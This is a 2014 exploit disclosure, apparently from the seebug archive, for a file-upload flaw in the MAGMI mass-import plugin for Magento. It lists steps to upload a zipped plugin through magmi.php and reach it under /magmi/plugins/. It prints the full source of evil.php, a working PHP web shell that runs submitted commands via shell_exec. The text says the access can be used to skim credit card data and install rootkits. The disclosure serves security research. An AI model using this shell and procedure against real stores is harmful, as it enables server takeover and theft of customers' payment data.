Magento Server MAGMI Plugin - Remote File Inclusion (RFI)

13 Nov 2014 00:00:00, reported by RootType
Source: seebug (www.seebug.org)

Magento Server MAGMI Plugin - Remote File Inclusion (RFI) vulnerability, allowing an attacker to execute remote commands and skim credit card data

Code

Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Bhasin
Contact info:  [email protected]
twitter:  @parvinderb - scorpio
 
Currently tested version:
Magento version:  Magento CE - 1.8 older
MAGMI version: v0.7.17a older
 
Download software link:
Magento server:  http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
 
MAGMI (MAGento Mass Importer) suffers from a file inclusion vulnerability
(RFI) that allows an attacker to upload essentially any PHP file (without
any sanity checks).  This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files, etc.  Essentially,
this gives the attacker the ability to execute remote commands on the
vulnerable server.
 
 
Steps to reproduce:
 
1.  Browse to http://<a magentosite.com>/magmi/web/magmi.php
2.  Under "Upload new plugins", click on "choose file".
    MAGento plugins are basically PHP files zipped, so create a PHP shell
    and zip it, e.g. evil.php inside a zip file named evil_plugin.zip.
    After the file has been uploaded, the page will say:
    Plugin packaged installed.
 evil.php:
 
 <?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";
 
    if(function_exists('shell_exec')) {
    $command=$_POST['command'];
    $output = shell_exec("$command");
    echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";
}
?>
 
3.  Your malicious evil.php file is now extracted.  All you then need to do
    is access the evil.php page at:
    http://<amagentosite.com>/magmi/plugins/evil.php
    At this point you could have access to the entire system: download
    any malware, install rootkits, skim credit card data, etc.
